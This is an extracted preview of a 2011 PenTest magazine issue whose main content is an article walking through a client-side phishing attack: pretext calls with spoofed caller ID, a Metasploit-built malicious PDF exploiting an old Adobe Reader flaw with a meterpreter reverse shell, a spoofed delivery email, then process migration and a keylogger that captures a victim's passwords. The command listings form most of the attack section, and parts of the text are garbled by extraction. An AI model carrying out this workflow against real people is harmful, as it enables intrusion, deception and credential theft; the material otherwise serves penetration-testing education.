Está en la página 1de 8


Ho! Ho! Ho!

08/2011 (08)

Managing Editor: Maciej Kozuszek Associate Editor: Shane MacDougall Betatesters / Proofreaders: Rishi Narang, Aby Rao, Jeff Weaver, Ed Werzyn, Daniel Wood Senior Consultant/Publisher: Pawe Marciniak CEO: Ewa Dudzic Art Director: Ireneusz Pogroszewski DTP: Ireneusz Pogroszewski Production Director: Andrzej Kuca Front page photo by: Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them. program To create graphs and diagrams we used by

Mathematical formulas created by Design Science MathType


The Christmas time is approaching slowly. Although its still almost a month until Christmas time, and many of us still dont think about it, weve decided to make this pre-Christmas surprise for you, and this time, weve made a small PenTest mishmash, so everyone who looks inside our magazine, will find something for him at last, Christmas is a time for everyone to have joy! Another part of this surprise is also a new column called PainPill, which is authored by Dean Bushmiller. Anyway, lets take a closer look on what you can find here. If youll jump to page 5, youll meet there our friend Aniket Kulkarni, who finally delivered us the second part of his article about Fuzzing. Inasmuch in the previous part you could have familiarized with the theory of fuzzing, this time aniket brings you some practice on plate. Next to Anikets article you can find Milinds Bhargava piece about Client Side Exploits, with attention-drawing title Hi! I hacked your computer. Milind would show you how to compromise the client side systems with the method involving social engineering. However, if youre not into fuzzing nor social engineering, see the next section Standard. This time, weve got here three different articles. First one, brought to us by our new contributor Ric Messier talks about stealth testing technique using NMAP. Ric is making an interesting remark about doing testing where operations staff is unaware of your activities. To read more, just jump to the page 20. Second article will get you straight to the sky, as it speaks about scanning cloud environment. In this short piece Steve Markey will give you all the essential information you may need on this topic. Third one, written by Srinivasan Sundara Rajan talks about BatchPenetration Testing. The author speaks about the importance of batch job in web app pentesting. For those, who felt that there was not enough information about SQL Injection in the previous issue, weve got something for you! Go to the page 34 and youll find out how to defend against SQL attacks and execute them. The author of this paper is Luis Davila. If we go to the page 38, we can see Shane MacDougall in action again. Hes coming back to us after a short absence with the paper about social engineering. Well, this article surely doesnt need recommendation. Right next to the Shanes article you can find a PainPill. Here Dean talks about the law issues concerning IT security specialists, and this one is a must for everyone whos working in the business. In the next issues Dean will be bringing us more interesting stuff, so stay tuned! And finally, at the end of this issue you will find an interview with Sumit Siddharth, author of popular security blog, speaker at many prestigious conferences and head of Penetration Testing at 7Safe Ltd. We hope, you will find this issue of PenTest compelling and worthful. Thank you all for your great support and invaluable help. Enjoy reading! Maciej Kozuszek & PenTest Team

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

08/2011 (8) December

Page 3





Fuzzing The art of Security Testing, Craft it, Analyze it

By Aniket Kulkarni


SQL Injection: Is it still a viable way to hack?

By Luis Davila

This article allows the reader understand the basics of fuzzing as well as the strengths, depth and effect of fuzzing. It explains how fuzzing is done in a practical sense, and shows the basics of initial data analysis and configurations. There is more of an emphasis on utilizing SPIKEfile for file fuzzing and Spike for packet/network Fuzzing.

SQL Injection has been known as an old vector of attack but it also has new variants and methods. It does not matter if it is a PYME or a big company, all of them can suffer from SQL injection vulnerabilities and their data would be at risk. As an example, Sony was hacked this year using SQL Injection as the method of attack and network user data was stolen.


With every passing day, with each new software, hackers around the world start looking for vulnerabilities and write exploit codes for them. Patching those vulnerabilities takes a lot of time and by then the systems have been compromised. As an attacker, there are many ways to compromise the client side systems, my preferred method involves social engineering.



Hi! I Hacked Your Computer

By Milind Bhargava


Effective Social Engineering: Why The Lowest Hanging Fruit Yields a Rotten Crop
By Shane MacDougall

While testing is often accomplished with the full knowledge and cooperation of a client, you may also be engaged to do testing where the operations staff is unaware of your activities. You may be used to test defenses where they are not allowed to prepare specifically for you or the client may simply want to know how their operations staff responds to events and if they can detect them.

This months article is a partial summary of the talk I gave at the ToorCon Security Conference in San Diego this October. This year the conference focused quite heavily on social engineering, and if that trend continues, professional schmoozers might well consider making the trip to Southern California next year.


Stealth Testing Using NMAP

By Ric Messier



The Business side of Pen Testing

By Dean Bushmiller

The cloud is a reality for IT professionals, but how secure is it? Since Cloud Service Providers (CSPs) do not allow cloud consumers to individually test their environments why not use a third party Vulnerability Assessment Scanner (VAS) tool/service?


Scanning Your Cloud Environment

By Steve Markey

If you are doing your job as a penetration tester attacking networks for hire, someone in some jurisdiction is going to think you are breaking the law and that they have jurisdiction over you. Eventually, someone is going to call the police. Eventually, the police or some ThreeLetter-Agency is going to view the tester as a real threat that must be stopped. In his articles, Dean will talk about a different security topic every month.



Interview with Sumit Siddharth

By Arao


BatchPenetration Testing vs Batch Jobs

By Srinivasan Sundara Rajan

We are seeing various tools and methodologies to perform the penetration testing for online web applications and ensure that these applications are not compromised with attacks like Cross Site Scripting, SQL Injection and others.

Sumit sid Siddharth works as a Head of Penetration Testing for 7Safe Limited in the UK. He has over 7 years of experience within the IT security industry. He specializes in the application and database security. Over the years, he has contributed a number of white-papers, articles, advisory, tools and exploits to the industry. He has been a speaker at many security conferences including Black Hat, DEF CON, OWASP Appsec, Troopers, SecT etc. He also runs the popular IT security blog: http://

08/2011 (8) December

Page 4



I hacked your computer

With every passing day, with each new software, hackers around the world start looking for vulnerabilities and write exploit codes for them. Patching those vulnerabilities takes a lot of time and by then the systems have been compromised. As an attacker, there are many ways to compromise the client side systems, my preferred method involves social engineering.

magine you receive a PDF attachment from a friend or a colleague, you open it and you get an Figure 2 PDF attachments because the file maybe damaged or not created properly. Your first thought is that the source may not be good, you run it through antivirus and it shows the file is clean; this gives you the feeling of safety. You now click ok to continue with your tasks to ask your IT for help for to try something else. You didnt realize that you just got owned! In a traditional scenario, an attacker would do dumpster diving and get emails and other printouts to get some information about you. I feel there are better ways to get such information and thats where the art of social engineering comes in. Many a times I have used social engineering techniques to prove that anything can be done if you know how to talk your way through it. In our scenario our attacker has been doing a lot of information gathering using tools such as the (MetaSploit Framework), (Maltego) and other tools to gather email addresses and information to launch a social engineering client side attack on the victim.

crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.


Location: Remote / Network Access Attack Type: Input Manipulation Impact: Loss of Integrity Solution: Upgrade Exploit: Exploit Public, Exploit Commercial Disclosure: OSVDB Verified, Vendor Verified


A remote overflow exists in Adobe Reader and Adobe Acrobat. The document reader fails to properly bounds check input to the util.printf() javascript function resulting in a stack-based overflow. With a specially
08/2011 (8) December

For our demonstration we will talk about how the said Social Engineering will be done to extract the required information. First we choose a victim, then we do go to their website and search the careers section for the available IT Jobs of the company to find out what jobs are vacant, their individual descriptions will give us the information about various software technologies in use. Getting a brief idea, we can then search major vendors websites for their testimonials or clients. Every vendor displays its client list on its website proudly to show credibility and to have major organizations vouch for their quality and work. A call to these vendors posing as a large organization, spoofing your caller id to reflect the same and talking to them, we can ask them to tell us about the victim company, saying we have worked with them before,

Page 14

we like the products you gave to them, and would like to have the same products for us. Or it can be saying that we have seen your client list and are not sure if we can trust them saying you are new to this region etc. Have the vendor give you the email address of the IT contact they have in the company so you can ask them personally about the vendors claim of excellent services. Most vendors will oblige to this thinking it will be good for this business. The higher the owner of the
Listing 1. Creating malicious PDF le
msf > use exploit/windows/fileformat/adobe_utilprintf FILENAME => XYZComputers-UpgradeInstructions.pdf PAYLOAD => windows/meterpreter/reverse_tcp LHOST => LPORT => 4455

mail id is in the victims hierarchy the better it is for the attacker. After a successful Social Engineering session and scraping for emails from the web, you have gained two key pieces of information. They use XYZ Computers for technical services. The IT Dept has an email address of

msf exploit(adobe_utilprintf) > set FILENAME XYZComputers-UpgradeInstructions.pdf msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set LHOST msf exploit(adobe_utilprintf) > set LPORT 4455 msf exploit(adobe_utilprintf) > show options Module options: Name ----




Current Setting XYZComputers-UpgradeInstructions.pdf






The file name.



The location of the file.

Payload options (windows/meterpreter/reverse_tcp): Name ---Current Setting -------------- 4455 process -------yes yes Required



Description Exit technique: seh, thread, process The local address The local port


Exploit target: Id -0 Name ----

Adobe Reader v8.1.2 (Windows XP SP3 English)

Listing 2. PDF le created

msf exploit(adobe_utilprintf) > exploit [*] Handler binding to LHOST

[*] Started reverse handler

[*] Creating 'XYZComputers-UpgradeInstructions.pdf' file... [*] Exploit completed, but no session was created. msf exploit(adobe_utilprintf) >

[*] Generated output file /pentest/exploits/framework3/data/exploits/XYZComputers-UpgradeInstructions.pdf

08/2011 (8) December

Page 15


Now what?
We want to gain shell on the IT Departments computer and run a key logger to gain passwords, intel about possible confidential things in use or any other juicy tidbits of info we can get our hands on. We start off by loading our (MetaSploit Framework) msfconsole.
Listing 3. Setting up multi handler listener
msf > use exploit/multi/handler

After we are loaded we want to create a malicious PDF that will give the victim a sense of security in opening it. To do that, it must appear legit, have a title that is realistic, and not be flagged by anti-virus or other security alert software. We are going to be using the Adobe Reader util.printf() JavaScript Function Stack Buffer Overflow Vulnerability.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 4455 LPORT => 4455 msf exploit(handler) > set LHOST LHOST => msf exploit(handler) > exploit [*] Handler binding to LHOST [*] Started reverse handler [*] Starting the payload handler...

Listing 4. Creating hacking e-mail

root@bt:~# sendEmail -t -f -s -u Important Upgrade Instructions -a /tmp/XYZComputers-UpgradeInstructions.pdf Reading message body from STDIN because the '-m' option was not used. If you are manually typing in a message: First line must be received within 60 seconds.

End manual input with a CTRL-D on its own line.

IT Dept, We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.

Sincerely, XYZ Computers Tech Support

Aug 24 17:32:51 bt sendEmail[13144]: Message input complete.

Aug 24 17:32:51 bt sendEmail[13144]: Email was sent successfully!

Listing 5. What displays on the attackers machine screen...

[*] Handler binding to LHOST [*] Started reverse handler [*] Starting the payload handler... session[*] Meterpreter session 1 opened ( -> meterpreter > [*] Sending stage (718336 bytes)

08/2011 (8) December

Page 16

Adobe Reader is prone to stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.
Listing 6. Further exploiting
meterpreter > ps Process list ============ PID --852 1308 2184

So we start by creating our malicious PDF file for use in this client side attack (Listing 1). Once we have all the options set the way we want, we run exploit to create our malicious file (Listing 2). So we can see that our pdf file was created in a subdirectory of where we are. So lets copy it to our /tmp directory so it is easier to locate later on in our exploit.

Name ---taskeng.exe Dwm.exe



C:\Windows\system32\taskeng.exe C:\Windows\system32\Dwm.exe


VMwareTray.exe iexplore.exe


VMwareUser.exe AcroRd32.exe

C:\Program Files\VMware\VMware Tools\VMwareTray.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe C:\Program Files\Internet Explorer\iexplore.exe


C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe

meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Migrating to explorer.exe...

[*] Current server process: svchost.exe (1076) [*] Migrating into process ID 816

[*] New server process: Explorer.EXE (816) meterpreter > sysinfo Computer: OFFSEC-PC OS : Windows Vista (Build 6000, ).

meterpreter > use priv

Loading extension priv...success. meterpreter > run post/windows/capture/keylog_recorder [*] Executing module against V-MAC-XP

[*] Starting the keystroke sniffer... [*] Recording keystrokes...

[*] Keystrokes being saved in to /root/.msf3/loot/

root@bt:~# cat /root/.msf3/loot/ Keystroke log started at Wed Mar 23 09:18:36 -0600 2011 Support, I tried to open this file 2-3 times with no success. I even had my admin and CFO try it, but no Thanks IT Dept

one can get it to open. I turned on the remote access server so you can log in to fix our problem. is admin and password for that session is 123456. Call me when you are done.

Our user name

08/2011 (8) December

Page 17


Adobe Reader Vulnerability. (n.d.). Retrieved from http:// Maltego. (n.d.). Retrieved from web5/ MetaSploit Framework. (n.d.). Retrieved from http:// Exploit Source code: projects/framework/repository/entry/modules/exploits/ windows/browser/adobe_utilprintf.rb CVE-2008-2992: name=2008-2992 49520: Adobe Reader / Acrobat util.printf() Function Crafted PDF File Handling Overow:

Figure 1. PDF Virus Check

Before we send the malicious file to our victim we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener (Listing 3). Now that our listener is waiting to receive its malicious payload we have to deliver this payload to the victim and since in our information gathering we obtained the email address of the IT Department we will use a handy little script called sendEmail to deliver this payload to the victim. With a kung-fu one-liner, we can attach the malicious pdf, use any smtp server we want and write a pretty convincing email from any address we want... (Listing 4). As we can see here, the script allows us to put any FROM (-f) address, any TO (-t) address, any SMTP (-s) server as well as Titles (-u) and our malicious attachment (-a). Once we do all that and press enter we can type any message we want, then press CTRL+D and this will send the email out to the victim. Now on the victims machine, our IT Department employee is getting in for the day and logging into his computer to check his email. He sees the very important document and copies it to his desktop as he always does, so he can scan this with his favorite anti-virus program. As we can see, it passed with flying colors so our IT admin is willing to open this file to quickly implement these very important upgrades. Clicking the file opens

Adobe but shows a greyed out window that never reveals a PDF. The greyed out window looks like this: (Figur 2 Adobe Reader Vulnerability). And then, on the attackers machine what is revealed... (Listing 5). We now have a shell on their computer through a malicious PDF client side attack. Of course what would be wise at this point is to move the shell to a different process, so when they kill Adobe we dont lose our shell. Then obtain system info, start a key logger and continue exploiting the network (Listing 6).


And thats it, its game over for the victim. The attacker can now not only get hold of sensitive information but also copy any data from the victims computer. This vulnerability affects Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument.


Upgrade to version 8.1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Or in a really bad case, reinstall your OS.

Milind Bhargava, (CEH), (ECSA) is in love with the eld of Information Security, in pursuit of his love he has completed his CEH & ECSA certications in 2010 from EC-Council and completed IT Security & Ethical Hacking course from Appin Noida, India. He has worked as Head of IT for an Oil & Gas MNC in Doha, Qatar, where his responsibilities included but were not limited to Network Security. He believes that ethical hacking is an addiction, which you can never master. Its a skill which you can control, but never stop learning more about. And so he continues on his quest as an eternal student.

Figure 2. Adobe Reader not able to open

08/2011 (8) December

Page 18